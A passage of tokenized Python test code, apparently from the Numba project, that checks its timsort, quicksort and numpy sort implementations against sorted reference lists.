assertPreciseEqual ( pybins , cbins , prec = '<STR_LIT>' , ulps = <NUM_LIT:2> ) <EOL> def check_values ( values ) : <EOL> bins = np . float64 ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:8> ] ) <EOL> check ( values , bins ) <EOL> check ( values . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) , bins ) <EOL> check ( values , <NUM_LIT:7> ) <EOL> check ( values , <NUM_LIT:7> , ( <NUM_LIT:1.0> , <NUM_LIT> ) ) <EOL> check ( values ) <EOL> values = np . float64 ( ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:7> , <NUM_LIT:8> , <EOL> <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:1.0> , - <NUM_LIT:0.0> ) ) <EOL> assert len ( values ) == <NUM_LIT:12> <EOL> self . rnd . shuffle ( values ) <EOL> check_values ( values ) </s>
<s> from __future__ import print_function <EOL> import copy <EOL> import itertools <EOL> import math <EOL> import random <EOL> import sys <EOL> import numpy as np <EOL> from numba . compiler import compile_isolated , Flags <EOL> from numba import jit , types , utils <EOL> import numba . unittest_support as unittest <EOL> from numba import testing <EOL> from . support import TestCase , MemoryLeakMixin , tag <EOL> from numba . targets . quicksort import make_py_quicksort , make_jit_quicksort <EOL> from . timsort import make_py_timsort , make_jit_timsort , MergeRun <EOL> def make_temp_list ( keys , n ) : <EOL> return [ keys [ <NUM_LIT:0> ] ] * n <EOL> def make_temp_array ( keys , n ) : <EOL> return np . empty ( n , keys . dtype ) <EOL> py_list_timsort = make_py_timsort ( make_temp_list ) <EOL> py_array_timsort = make_py_timsort ( make_temp_array ) <EOL> jit_list_timsort = make_jit_timsort ( make_temp_list ) <EOL> jit_array_timsort = make_jit_timsort ( make_temp_array ) <EOL> py_quicksort = make_py_quicksort ( ) <EOL> jit_quicksort = make_jit_quicksort ( ) <EOL> def sort_usecase ( val ) : <EOL> val . sort ( ) <EOL> def sorted_usecase ( val ) : <EOL> return sorted ( val ) <EOL> def sorted_reverse_usecase ( val , b ) : <EOL> return sorted ( val , reverse = b ) <EOL> def np_sort_usecase ( val ) : <EOL> return np . sort ( val ) <EOL> def list_sort_usecase ( n ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> l = [ ] <EOL> for i in range ( n ) : <EOL> l . append ( np . random . random ( ) ) <EOL> ll = l [ : ] <EOL> ll . sort ( ) <EOL> return l , ll <EOL> def list_sort_reverse_usecase ( n , b ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> l = [ ] <EOL> for i in range ( n ) : <EOL> l . append ( np . random . random ( ) ) <EOL> ll = l [ : ] <EOL> ll . sort ( reverse = b ) <EOL> return l , ll <EOL> class BaseSortingTest ( object ) : <EOL> def random_list ( self , n , offset = <NUM_LIT:10> ) : <EOL> random . 
seed ( <NUM_LIT> ) <EOL> l = list ( range ( offset , offset + n ) ) <EOL> random . shuffle ( l ) <EOL> return l <EOL> def sorted_list ( self , n , offset = <NUM_LIT:10> ) : <EOL> return list ( range ( offset , offset + n ) ) <EOL> def revsorted_list ( self , n , offset = <NUM_LIT:10> ) : <EOL> return list ( range ( offset , offset + n ) ) [ : : - <NUM_LIT:1> ] <EOL> def initially_sorted_list ( self , n , m = None , offset = <NUM_LIT:10> ) : <EOL> if m is None : <EOL> m = n // <NUM_LIT:2> <EOL> l = self . sorted_list ( m , offset ) <EOL> l += self . random_list ( n - m , offset = l [ - <NUM_LIT:1> ] + offset ) <EOL> return l <EOL> def duprandom_list ( self , n , factor = None , offset = <NUM_LIT:10> ) : <EOL> random . seed ( <NUM_LIT> ) <EOL> if factor is None : <EOL> factor = int ( math . sqrt ( n ) ) <EOL> l = ( list ( range ( offset , offset + ( n // factor ) + <NUM_LIT:1> ) ) * ( factor + <NUM_LIT:1> ) ) [ : n ] <EOL> assert len ( l ) == n <EOL> random . shuffle ( l ) <EOL> return l <EOL> def dupsorted_list ( self , n , factor = None , offset = <NUM_LIT:10> ) : <EOL> if factor is None : <EOL> factor = int ( math . sqrt ( n ) ) <EOL> l = ( list ( range ( offset , offset + ( n // factor ) + <NUM_LIT:1> ) ) * ( factor + <NUM_LIT:1> ) ) [ : n ] <EOL> assert len ( l ) == n , ( len ( l ) , n ) <EOL> l . sort ( ) <EOL> return l <EOL> def assertSorted ( self , orig , result ) : <EOL> self . assertEqual ( len ( result ) , len ( orig ) ) <EOL> self . assertEqual ( list ( result ) , sorted ( orig ) ) <EOL> def assertSortedValues ( self , orig , orig_values , result , result_values ) : <EOL> self . assertEqual ( len ( result ) , len ( orig ) ) <EOL> self . assertEqual ( list ( result ) , sorted ( orig ) ) <EOL> zip_sorted = sorted ( zip ( orig , orig_values ) , key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> zip_result = list ( zip ( result , result_values ) ) <EOL> self . 
assertEqual ( zip_sorted , zip_result ) <EOL> for i in range ( len ( zip_result ) - <NUM_LIT:1> ) : <EOL> ( k1 , v1 ) , ( k2 , v2 ) = zip_result [ i ] , zip_result [ i + <NUM_LIT:1> ] <EOL> if k1 == k2 : <EOL> self . assertLess ( orig_values . index ( v1 ) , orig_values . index ( v2 ) ) <EOL> def fibo ( self ) : <EOL> a = <NUM_LIT:1> <EOL> b = <NUM_LIT:1> <EOL> while True : <EOL> yield a <EOL> a , b = b , a + b <EOL> def make_sample_sorted_lists ( self , n ) : <EOL> lists = [ ] <EOL> for offset in ( <NUM_LIT:20> , <NUM_LIT> ) : <EOL> lists . append ( self . sorted_list ( n , offset ) ) <EOL> lists . append ( self . dupsorted_list ( n , offset ) ) <EOL> return lists <EOL> def make_sample_lists ( self , n ) : <EOL> lists = [ ] <EOL> for offset in ( <NUM_LIT:20> , <NUM_LIT> ) : <EOL> lists . append ( self . sorted_list ( n , offset ) ) <EOL> lists . append ( self . dupsorted_list ( n , offset ) ) <EOL> lists . append ( self . revsorted_list ( n , offset ) ) <EOL> lists . append ( self . duprandom_list ( n , offset ) ) <EOL> return lists <EOL> class BaseTimsortTest ( BaseSortingTest ) : <EOL> def merge_init ( self , keys ) : <EOL> f = self . timsort . merge_init <EOL> return f ( keys ) <EOL> @ tag ( '<STR_LIT>' ) <EOL> def test_binarysort ( self ) : <EOL> n = <NUM_LIT:20> <EOL> def check ( l , n , start = <NUM_LIT:0> ) : <EOL> res = self . array_factory ( l ) <EOL> f ( res , res , <NUM_LIT:0> , n , start ) <EOL> self . assertSorted ( l , res ) <EOL> f = self . timsort . binarysort <EOL> l = self . sorted_list ( n ) <EOL> check ( l , n ) <EOL> check ( l , n , n // <NUM_LIT:2> ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . initially_sorted_list ( n , n // <NUM_LIT:2> ) <EOL> check ( l , n ) <EOL> check ( l , n , n // <NUM_LIT:2> ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . random_list ( n ) <EOL> check ( l , n ) <EOL> l = self . 
duprandom_list ( n ) <EOL> check ( l , n ) <EOL> def test_binarysort_with_values ( self ) : <EOL> n = <NUM_LIT:20> <EOL> v = list ( range ( <NUM_LIT:100> , <NUM_LIT:100> + n ) ) <EOL> def check ( l , n , start = <NUM_LIT:0> ) : <EOL> res = self . array_factory ( l ) <EOL> res_v = self . array_factory ( v ) <EOL> f ( res , res_v , <NUM_LIT:0> , n , start ) <EOL> self . assertSortedValues ( l , v , res , res_v ) <EOL> f = self . timsort . binarysort <EOL> l = self . sorted_list ( n ) <EOL> check ( l , n ) <EOL> check ( l , n , n // <NUM_LIT:2> ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . initially_sorted_list ( n , n // <NUM_LIT:2> ) <EOL> check ( l , n ) <EOL> check ( l , n , n // <NUM_LIT:2> ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . random_list ( n ) <EOL> check ( l , n ) <EOL> l = self . duprandom_list ( n ) <EOL> check ( l , n ) <EOL> def test_count_run ( self ) : <EOL> n = <NUM_LIT:16> <EOL> f = self . timsort . count_run <EOL> def check ( l , lo , hi ) : <EOL> n , desc = f ( self . array_factory ( l ) , lo , hi ) <EOL> if desc : <EOL> for k in range ( lo , lo + n - <NUM_LIT:1> ) : <EOL> a , b = l [ k ] , l [ k + <NUM_LIT:1> ] <EOL> self . assertGreater ( a , b ) <EOL> if lo + n < hi : <EOL> self . assertLessEqual ( l [ lo + n - <NUM_LIT:1> ] , l [ lo + n ] ) <EOL> else : <EOL> for k in range ( lo , lo + n - <NUM_LIT:1> ) : <EOL> a , b = l [ k ] , l [ k + <NUM_LIT:1> ] <EOL> self . assertLessEqual ( a , b ) <EOL> if lo + n < hi : <EOL> self . assertGreater ( l [ lo + n - <NUM_LIT:1> ] , l [ lo + n ] , l ) <EOL> l = self . sorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check ( l , <NUM_LIT:0> , n ) <EOL> check ( l , <NUM_LIT:1> , n - <NUM_LIT:1> ) <EOL> check ( l , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> l = self . 
revsorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check ( l , <NUM_LIT:0> , n ) <EOL> check ( l , <NUM_LIT:1> , n - <NUM_LIT:1> ) <EOL> check ( l , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> l = self . random_list ( n , offset = <NUM_LIT:100> ) <EOL> for i in range ( len ( l ) - <NUM_LIT:1> ) : <EOL> check ( l , i , n ) <EOL> l = self . duprandom_list ( n , offset = <NUM_LIT:100> ) <EOL> for i in range ( len ( l ) - <NUM_LIT:1> ) : <EOL> check ( l , i , n ) <EOL> @ tag ( '<STR_LIT>' ) <EOL> def test_gallop_left ( self ) : <EOL> n = <NUM_LIT:20> <EOL> f = self . timsort . gallop_left <EOL> def check ( l , key , start , stop , hint ) : <EOL> k = f ( key , l , start , stop , hint ) <EOL> self . assertGreaterEqual ( k , start ) <EOL> self . assertLessEqual ( k , stop ) <EOL> if k > start : <EOL> self . assertLess ( l [ k - <NUM_LIT:1> ] , key ) <EOL> if k < stop : <EOL> self . assertGreaterEqual ( l [ k ] , key ) <EOL> def check_all_hints ( l , key , start , stop ) : <EOL> for hint in range ( start , stop ) : <EOL> check ( l , key , start , stop , hint ) <EOL> def check_sorted_list ( l ) : <EOL> l = self . array_factory ( l ) <EOL> for key in ( l [ <NUM_LIT:5> ] , l [ <NUM_LIT:15> ] , l [ <NUM_LIT:0> ] , - <NUM_LIT:1000> , l [ - <NUM_LIT:1> ] , <NUM_LIT:1000> ) : <EOL> check_all_hints ( l , key , <NUM_LIT:0> , n ) <EOL> check_all_hints ( l , key , <NUM_LIT:1> , n - <NUM_LIT:1> ) <EOL> check_all_hints ( l , key , <NUM_LIT:8> , n - <NUM_LIT:8> ) <EOL> l = self . sorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check_sorted_list ( l ) <EOL> l = self . dupsorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check_sorted_list ( l ) <EOL> def test_gallop_right ( self ) : <EOL> n = <NUM_LIT:20> <EOL> f = self . timsort . gallop_right <EOL> def check ( l , key , start , stop , hint ) : <EOL> k = f ( key , l , start , stop , hint ) <EOL> self . assertGreaterEqual ( k , start ) <EOL> self . assertLessEqual ( k , stop ) <EOL> if k > start : <EOL> self . 
assertLessEqual ( l [ k - <NUM_LIT:1> ] , key ) <EOL> if k < stop : <EOL> self . assertGreater ( l [ k ] , key ) <EOL> def check_all_hints ( l , key , start , stop ) : <EOL> for hint in range ( start , stop ) : <EOL> check ( l , key , start , stop , hint ) <EOL> def check_sorted_list ( l ) : <EOL> l = self . array_factory ( l ) <EOL> for key in ( l [ <NUM_LIT:5> ] , l [ <NUM_LIT:15> ] , l [ <NUM_LIT:0> ] , - <NUM_LIT:1000> , l [ - <NUM_LIT:1> ] , <NUM_LIT:1000> ) : <EOL> check_all_hints ( l , key , <NUM_LIT:0> , n ) <EOL> check_all_hints ( l , key , <NUM_LIT:1> , n - <NUM_LIT:1> ) <EOL> check_all_hints ( l , key , <NUM_LIT:8> , n - <NUM_LIT:8> ) <EOL> l = self . sorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check_sorted_list ( l ) <EOL> l = self . dupsorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check_sorted_list ( l ) <EOL> def test_merge_compute_minrun ( self ) : <EOL> f = self . timsort . merge_compute_minrun <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:64> ) : <EOL> self . assertEqual ( f ( i ) , i ) <EOL> for i in range ( <NUM_LIT:6> , <NUM_LIT> ) : <EOL> if <NUM_LIT:2> ** i > sys . maxsize : <EOL> break <EOL> self . assertEqual ( f ( <NUM_LIT:2> ** i ) , <NUM_LIT:32> ) <EOL> for i in self . fibo ( ) : <EOL> if i < <NUM_LIT:64> : <EOL> continue <EOL> if i >= sys . maxsize : <EOL> break <EOL> k = f ( i ) <EOL> self . assertGreaterEqual ( k , <NUM_LIT:32> ) <EOL> self . assertLessEqual ( k , <NUM_LIT:64> ) <EOL> if i > <NUM_LIT> : <EOL> quot = i // k <EOL> p = <NUM_LIT:2> ** utils . bit_length ( quot ) <EOL> self . assertLess ( quot , p ) <EOL> self . assertGreaterEqual ( quot , <NUM_LIT> * p ) <EOL> def check_merge_lo_hi ( self , func , a , b ) : <EOL> na = len ( a ) <EOL> nb = len ( b ) <EOL> orig_keys = [ <NUM_LIT> ] + a + b + [ - <NUM_LIT> ] <EOL> keys = self . array_factory ( orig_keys ) <EOL> ms = self . merge_init ( keys ) <EOL> ssa = <NUM_LIT:1> <EOL> ssb = ssa + na <EOL> new_ms = func ( ms , keys , keys , ssa , na , ssb , nb ) <EOL> self . 
assertEqual ( keys [ <NUM_LIT:0> ] , orig_keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( keys [ - <NUM_LIT:1> ] , orig_keys [ - <NUM_LIT:1> ] ) <EOL> self . assertSorted ( orig_keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] , keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> self . assertGreaterEqual ( len ( new_ms . keys ) , len ( ms . keys ) ) <EOL> self . assertGreaterEqual ( len ( new_ms . values ) , len ( ms . values ) ) <EOL> self . assertIs ( new_ms . pending , ms . pending ) <EOL> self . assertGreaterEqual ( new_ms . min_gallop , <NUM_LIT:1> ) <EOL> def test_merge_lo_hi ( self ) : <EOL> f_lo = self . timsort . merge_lo <EOL> f_hi = self . timsort . merge_hi <EOL> for ( na , nb ) in [ ( <NUM_LIT:12> , <NUM_LIT:16> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:100> , <NUM_LIT> ) , ( <NUM_LIT:1000> , <NUM_LIT> ) ] : <EOL> for a , b in itertools . product ( self . make_sample_sorted_lists ( na ) , <EOL> self . make_sample_sorted_lists ( nb ) ) : <EOL> self . check_merge_lo_hi ( f_lo , a , b ) <EOL> self . check_merge_lo_hi ( f_hi , b , a ) <EOL> def check_merge_at ( self , a , b ) : <EOL> f = self . timsort . merge_at <EOL> na = len ( a ) <EOL> nb = len ( b ) <EOL> orig_keys = [ <NUM_LIT> ] + a + b + [ - <NUM_LIT> ] <EOL> ssa = <NUM_LIT:1> <EOL> ssb = ssa + na <EOL> stack_sentinel = MergeRun ( - <NUM_LIT> , - <NUM_LIT> ) <EOL> def run_merge_at ( ms , keys , i ) : <EOL> new_ms = f ( ms , keys , keys , i ) <EOL> self . assertEqual ( keys [ <NUM_LIT:0> ] , orig_keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( keys [ - <NUM_LIT:1> ] , orig_keys [ - <NUM_LIT:1> ] ) <EOL> self . assertSorted ( orig_keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] , keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> self . assertIs ( new_ms . pending , ms . pending ) <EOL> self . assertEqual ( ms . pending [ i ] , ( ssa , na + nb ) ) <EOL> self . assertEqual ( ms . pending [ <NUM_LIT:0> ] , stack_sentinel ) <EOL> return new_ms <EOL> keys = self . array_factory ( orig_keys ) <EOL> ms = self . 
merge_init ( keys ) <EOL> ms = self . timsort . merge_append ( ms , stack_sentinel ) <EOL> i = ms . n <EOL> ms = self . timsort . merge_append ( ms , MergeRun ( ssa , na ) ) <EOL> ms = self . timsort . merge_append ( ms , MergeRun ( ssb , nb ) ) <EOL> ms = run_merge_at ( ms , keys , i ) <EOL> self . assertEqual ( ms . n , i + <NUM_LIT:1> ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> ms = self . merge_init ( keys ) <EOL> ms = self . timsort . merge_append ( ms , stack_sentinel ) <EOL> i = ms . n <EOL> ms = self . timsort . merge_append ( ms , MergeRun ( ssa , na ) ) <EOL> ms = self . timsort . merge_append ( ms , MergeRun ( ssb , nb ) ) <EOL> last_run = MergeRun ( ssb + nb , <NUM_LIT:1> ) <EOL> ms = self . timsort . merge_append ( ms , last_run ) <EOL> ms = run_merge_at ( ms , keys , i ) <EOL> self . assertEqual ( ms . n , i + <NUM_LIT:2> ) <EOL> self . assertEqual ( ms . pending [ ms . n - <NUM_LIT:1> ] , last_run ) <EOL> def test_merge_at ( self ) : <EOL> for ( na , nb ) in [ ( <NUM_LIT:12> , <NUM_LIT:16> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:100> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] : <EOL> for a , b in itertools . product ( self . make_sample_sorted_lists ( na ) , <EOL> self . make_sample_sorted_lists ( nb ) ) : <EOL> self . check_merge_at ( a , b ) <EOL> self . check_merge_at ( b , a ) <EOL> def test_merge_force_collapse ( self ) : <EOL> f = self . timsort . merge_force_collapse <EOL> sizes_list = [ ( <NUM_LIT:8> , <NUM_LIT:10> , <NUM_LIT:15> , <NUM_LIT:20> ) ] <EOL> sizes_list . append ( sizes_list [ <NUM_LIT:0> ] [ : : - <NUM_LIT:1> ] ) <EOL> for sizes in sizes_list : <EOL> for chunks in itertools . product ( * ( self . make_sample_sorted_lists ( n ) <EOL> for n in sizes ) ) : <EOL> orig_keys = sum ( chunks , [ ] ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> ms = self . merge_init ( keys ) <EOL> pos = <NUM_LIT:0> <EOL> for c in chunks : <EOL> ms = self . timsort . 
merge_append ( ms , MergeRun ( pos , len ( c ) ) ) <EOL> pos += len ( c ) <EOL> self . assertEqual ( sum ( ms . pending [ ms . n - <NUM_LIT:1> ] ) , len ( keys ) ) <EOL> ms = f ( ms , keys , keys ) <EOL> self . assertEqual ( ms . n , <NUM_LIT:1> ) <EOL> self . assertEqual ( ms . pending [ <NUM_LIT:0> ] , MergeRun ( <NUM_LIT:0> , len ( keys ) ) ) <EOL> self . assertSorted ( orig_keys , keys ) <EOL> def test_run_timsort ( self ) : <EOL> f = self . timsort . run_timsort <EOL> for size_factor in ( <NUM_LIT:1> , <NUM_LIT:10> ) : <EOL> sizes = ( <NUM_LIT:15> , <NUM_LIT:30> , <NUM_LIT:20> ) <EOL> all_lists = [ self . make_sample_lists ( n * size_factor ) for n in sizes ] <EOL> for chunks in itertools . product ( * all_lists ) : <EOL> orig_keys = sum ( chunks , [ ] ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> f ( keys ) <EOL> self . assertSorted ( orig_keys , keys ) <EOL> def test_run_timsort_with_values ( self ) : <EOL> f = self . timsort . run_timsort_with_values <EOL> for size_factor in ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> chunk_size = <NUM_LIT> * size_factor <EOL> a = self . dupsorted_list ( chunk_size ) <EOL> b = self . duprandom_list ( chunk_size ) <EOL> c = self . revsorted_list ( chunk_size ) <EOL> orig_keys = a + b + c <EOL> orig_values = list ( range ( <NUM_LIT:1000> , <NUM_LIT:1000> + len ( orig_keys ) ) ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> values = self . array_factory ( orig_values ) <EOL> f ( keys , values ) <EOL> self . assertSortedValues ( orig_keys , orig_values , keys , values ) <EOL> class TestTimsortPurePython ( BaseTimsortTest , TestCase ) : <EOL> timsort = py_list_timsort <EOL> array_factory = list <EOL> class TestTimsortArraysPurePython ( BaseTimsortTest , TestCase ) : <EOL> timsort = py_array_timsort <EOL> def array_factory ( self , lst ) : <EOL> return np . array ( lst , dtype = np . 
int32 ) <EOL> class JITTimsortMixin ( object ) : <EOL> timsort = jit_array_timsort <EOL> test_merge_at = None <EOL> test_merge_force_collapse = None <EOL> def wrap_with_mergestate ( self , timsort , func , _cache = { } ) : <EOL> """<STR_LIT>""" <EOL> key = timsort , func <EOL> if key in _cache : <EOL> return _cache [ key ] <EOL> merge_init = timsort . merge_init <EOL> @ timsort . compile <EOL> def wrapper ( keys , values , * args ) : <EOL> ms = merge_init ( keys ) <EOL> res = func ( ms , keys , values , * args ) <EOL> return res <EOL> _cache [ key ] = wrapper <EOL> return wrapper <EOL> class TestTimsortArrays ( JITTimsortMixin , BaseTimsortTest , TestCase ) : <EOL> def array_factory ( self , lst ) : <EOL> return np . array ( lst , dtype = np . int32 ) <EOL> def check_merge_lo_hi ( self , func , a , b ) : <EOL> na = len ( a ) <EOL> nb = len ( b ) <EOL> func = self . wrap_with_mergestate ( self . timsort , func ) <EOL> orig_keys = [ <NUM_LIT> ] + a + b + [ - <NUM_LIT> ] <EOL> keys = self . array_factory ( orig_keys ) <EOL> ssa = <NUM_LIT:1> <EOL> ssb = ssa + na <EOL> new_ms = func ( keys , keys , ssa , na , ssb , nb ) <EOL> self . assertEqual ( keys [ <NUM_LIT:0> ] , orig_keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( keys [ - <NUM_LIT:1> ] , orig_keys [ - <NUM_LIT:1> ] ) <EOL> self . assertSorted ( orig_keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] , keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> class BaseQuicksortTest ( BaseSortingTest ) : <EOL> def test_insertion_sort ( self ) : <EOL> n = <NUM_LIT:20> <EOL> def check ( l , n ) : <EOL> res = self . array_factory ( [ <NUM_LIT> ] + l + [ - <NUM_LIT> ] ) <EOL> f ( res , <NUM_LIT:1> , n ) <EOL> self . assertEqual ( res [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> self . assertEqual ( res [ - <NUM_LIT:1> ] , - <NUM_LIT> ) <EOL> self . assertSorted ( l , res [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> f = self . quicksort . insertion_sort <EOL> l = self . sorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . 
revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . initially_sorted_list ( n , n // <NUM_LIT:2> ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . random_list ( n ) <EOL> check ( l , n ) <EOL> l = self . duprandom_list ( n ) <EOL> check ( l , n ) <EOL> def test_partition ( self ) : <EOL> n = <NUM_LIT:20> <EOL> def check ( l , n ) : <EOL> res = self . array_factory ( [ <NUM_LIT> ] + l + [ - <NUM_LIT> ] ) <EOL> index = f ( res , <NUM_LIT:1> , n ) <EOL> self . assertEqual ( res [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> self . assertEqual ( res [ - <NUM_LIT:1> ] , - <NUM_LIT> ) <EOL> pivot = res [ index ] <EOL> for i in range ( <NUM_LIT:1> , index ) : <EOL> self . assertLessEqual ( res [ i ] , pivot ) <EOL> for i in range ( index + <NUM_LIT:1> , n ) : <EOL> self . assertGreaterEqual ( res [ i ] , pivot ) <EOL> f = self . quicksort . partition <EOL> l = self . sorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . initially_sorted_list ( n , n // <NUM_LIT:2> ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . random_list ( n ) <EOL> check ( l , n ) <EOL> l = self . duprandom_list ( n ) <EOL> check ( l , n ) <EOL> def test_partition3 ( self ) : <EOL> n = <NUM_LIT:20> <EOL> def check ( l , n ) : <EOL> res = self . array_factory ( [ <NUM_LIT> ] + l + [ - <NUM_LIT> ] ) <EOL> lt , gt = f ( res , <NUM_LIT:1> , n ) <EOL> self . assertEqual ( res [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> self . assertEqual ( res [ - <NUM_LIT:1> ] , - <NUM_LIT> ) <EOL> pivot = res [ lt ] <EOL> for i in range ( <NUM_LIT:1> , lt ) : <EOL> self . assertLessEqual ( res [ i ] , pivot ) <EOL> for i in range ( lt , gt + <NUM_LIT:1> ) : <EOL> self . assertEqual ( res [ i ] , pivot ) <EOL> for i in range ( gt + <NUM_LIT:1> , n ) : <EOL> self . assertGreater ( res [ i ] , pivot ) <EOL> f = self . quicksort . partition3 <EOL> l = self . 
sorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . initially_sorted_list ( n , n // <NUM_LIT:2> ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . random_list ( n ) <EOL> check ( l , n ) <EOL> l = self . duprandom_list ( n ) <EOL> check ( l , n ) <EOL> @ tag ( '<STR_LIT>' ) <EOL> def test_run_quicksort ( self ) : <EOL> f = self . quicksort . run_quicksort <EOL> for size_factor in ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> sizes = ( <NUM_LIT:15> , <NUM_LIT:20> ) <EOL> all_lists = [ self . make_sample_lists ( n * size_factor ) for n in sizes ] <EOL> for chunks in itertools . product ( * all_lists ) : <EOL> orig_keys = sum ( chunks , [ ] ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> f ( keys ) <EOL> self . assertSorted ( orig_keys , keys ) <EOL> def test_run_quicksort_lt ( self ) : <EOL> def lt ( a , b ) : <EOL> return a > b <EOL> f = self . make_quicksort ( lt = lt ) . run_quicksort <EOL> for size_factor in ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> sizes = ( <NUM_LIT:15> , <NUM_LIT:20> ) <EOL> all_lists = [ self . make_sample_lists ( n * size_factor ) for n in sizes ] <EOL> for chunks in itertools . product ( * all_lists ) : <EOL> orig_keys = sum ( chunks , [ ] ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> f ( keys ) <EOL> self . assertSorted ( orig_keys , keys [ : : - <NUM_LIT:1> ] ) <EOL> def lt_floats ( a , b ) : <EOL> return math . isnan ( b ) or a < b <EOL> f = self . make_quicksort ( lt = lt_floats ) . run_quicksort <EOL> np . random . seed ( <NUM_LIT> ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> orig [ np . random . random ( size = size ) < <NUM_LIT:0.1> ] = float ( '<STR_LIT>' ) <EOL> orig_keys = list ( orig ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> f ( keys ) <EOL> non_nans = orig [ ~ np . 
isnan ( orig ) ] <EOL> self . assertSorted ( non_nans , keys [ : len ( non_nans ) ] ) <EOL> class TestQuicksortPurePython ( BaseQuicksortTest , TestCase ) : <EOL> quicksort = py_quicksort <EOL> make_quicksort = staticmethod ( make_py_quicksort ) <EOL> array_factory = list <EOL> class TestQuicksortArrays ( BaseQuicksortTest , TestCase ) : <EOL> quicksort = jit_quicksort <EOL> make_quicksort = staticmethod ( make_jit_quicksort ) <EOL> def array_factory ( self , lst ) : <EOL> return np . array ( lst , dtype = np . float64 ) <EOL> class TestNumpySort ( TestCase ) : <EOL> def setUp ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> def check_sort_inplace ( self , pyfunc , cfunc , val ) : <EOL> expected = copy . copy ( val ) <EOL> got = copy . copy ( val ) <EOL> pyfunc ( expected ) <EOL> cfunc ( got ) <EOL> self . assertPreciseEqual ( got , expected ) <EOL> def check_sort_copy ( self , pyfunc , cfunc , val ) : <EOL> orig = copy . copy ( val ) <EOL> expected = pyfunc ( val ) <EOL> got = cfunc ( val ) <EOL> self . assertPreciseEqual ( got , expected ) <EOL> self . assertPreciseEqual ( val , orig ) <EOL> def test_array_sort_int ( self ) : <EOL> pyfunc = sort_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . randint ( <NUM_LIT> , size = size ) <EOL> self . check_sort_inplace ( pyfunc , cfunc , orig ) <EOL> @ tag ( '<STR_LIT>' ) <EOL> def test_array_sort_float ( self ) : <EOL> pyfunc = sort_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> self . check_sort_inplace ( pyfunc , cfunc , orig ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> orig [ np . random . 
